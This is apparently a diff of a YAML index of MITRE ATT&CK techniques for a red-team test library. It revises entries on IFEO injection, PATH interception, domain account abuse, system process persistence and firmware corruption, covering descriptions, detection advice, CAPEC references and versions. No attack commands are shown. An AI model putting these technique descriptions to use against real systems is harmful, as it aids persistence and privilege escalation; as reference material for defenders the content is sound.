- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_platforms:
+ - Windows
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1546.015:
technique:
@@ -10776,34 +11079,6 @@ persistence:
atomic_tests: []
T1543:
technique:
- created: '2020-01-10T16:03:18.865Z'
- modified: '2020-03-25T22:32:16.537Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- type: attack-pattern
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- description: "Adversaries may create or modify system-level processes to repeatedly
- execute malicious payloads as part of persistence. When operating systems
- boot up, they can start processes that perform background system functions.
- On Windows and Linux, these system processes are referred to as services.
- (Citation: TechNet Services) On macOS, launchd processes known as [Launch
- Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
- are run to finish system initialization and load user specific parameters.(Citation:
- AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
- daemons, or agents that can be configured to execute at startup or a repeatable
- interval in order to establish persistence. Similarly, adversaries may modify
- existing services, daemons, or agents to achieve the same effect. \n\nServices,
- daemons, or agents may be created with administrator privileges but executed
- under root/SYSTEM privileges. Adversaries may leverage this functionality
- to create or modify system processes in order to escalate privileges. (Citation:
- OSX Malware Detection). "
- name: Create or Modify System Process
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1543
@@ -10819,10 +11094,42 @@ persistence:
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
source_name: OSX Malware Detection
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create or Modify System Process
+ description: "Adversaries may create or modify system-level processes to repeatedly
+ execute malicious payloads as part of persistence. When operating systems
+ boot up, they can start processes that perform background system functions.
+ On Windows and Linux, these system processes are referred to as services.
+ (Citation: TechNet Services) On macOS, launchd processes known as [Launch
+ Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
+ are run to finish system initialization and load user specific parameters.(Citation:
+ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
+ daemons, or agents that can be configured to execute at startup or a repeatable
+ interval in order to establish persistence. Similarly, adversaries may modify
+ existing services, daemons, or agents to achieve the same effect. \n\nServices,
+ daemons, or agents may be created with administrator privileges but executed
+ under root/SYSTEM privileges. Adversaries may leverage this functionality
+ to create or modify system processes in order to escalate privileges. (Citation:
+ OSX Malware Detection). "
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T13:46:29.922Z'
+ created: '2020-01-10T16:03:18.865Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitor for changes to system processes that do not correlate
with known software, patch cycles, etc., including by comparing results against
a trusted system baseline. New, benign system processes may be created during
@@ -10835,14 +11142,10 @@ persistence:
process call trees from known services and for execution of other commands
that could relate to Discovery or other adversary techniques. \n\nMonitor
for changes to files associated with system-level processes."
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1053.003:
technique:
@@ -11081,9 +11384,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -11111,7 +11414,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -11170,6 +11473,9 @@ persistence:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -11196,9 +11502,9 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -11349,31 +11655,13 @@ persistence:
elevation_required: false
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -11386,22 +11674,43 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -11420,9 +11729,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -11439,7 +11748,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -11537,6 +11846,18 @@ persistence:
- source_name: mitre-attack
external_id: T1546
url: https://attack.mitre.org/techniques/T1546
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
+ - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf
+ description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
+ Retrieved July 10, 2017.
+ source_name: Malware Persistence on OS X
+ - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux
+ Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.
+ source_name: amnesia malware
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -11548,8 +11869,9 @@ persistence:
may abuse these mechanisms as a means of maintaining persistent access to
a victim via repeatedly executing malicious code. After gaining access to
a victim system, adversaries may create/modify event triggers to point to
- malicious content that will be executed whenever the event trigger is invoked.
- \n\nSince the execution can be proxied by an account with higher permissions,
+ malicious content that will be executed whenever the event trigger is invoked.(Citation:
+ FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia
+ malware)\n\nSince the execution can be proxied by an account with higher permissions,
such as SYSTEM or service accounts, an adversary may be able to abuse these
triggered execution mechanisms to escalate their privileges. "
id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -11559,9 +11881,9 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-09T13:55:51.501Z'
+ modified: '2020-10-21T18:48:27.576Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
@@ -11678,7 +12000,7 @@ persistence:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -11830,7 +12152,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -11960,11 +12282,11 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Image File Execution Options Injection
description: |-
- Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
- IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+ IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
@@ -11978,15 +12300,15 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:39:50.839Z'
+ modified: '2020-08-26T14:18:08.480Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
@@ -12329,6 +12651,12 @@ persistence:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -12358,7 +12686,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -12371,7 +12699,7 @@ persistence:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -12640,6 +12968,12 @@ persistence:
- source_name: mitre-attack
external_id: T1543.004
url: https://attack.mitre.org/techniques/T1543/004
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
@@ -12686,11 +13020,11 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:27:49.609Z'
+ modified: '2020-09-16T15:46:44.130Z'
created: '2020-01-17T19:23:15.227Z'
x_mitre_data_sources:
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_effective_permissions:
- root
@@ -13841,62 +14175,55 @@ persistence:
atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -13914,9 +14241,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -13932,6 +14259,16 @@ persistence:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -13956,23 +14293,13 @@ persistence:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -14000,7 +14327,17 @@ persistence:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -14176,9 +14513,9 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -14191,6 +14528,7 @@ persistence:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1547.010:
technique:
@@ -14405,11 +14743,12 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-05-19T21:22:38.174Z'
+ modified: '2020-10-22T16:35:54.740Z'
created: '2019-11-13T14:44:49.439Z'
x_mitre_platforms:
- Linux
- Windows
+ - Network
x_mitre_data_sources:
- VBR
- MBR
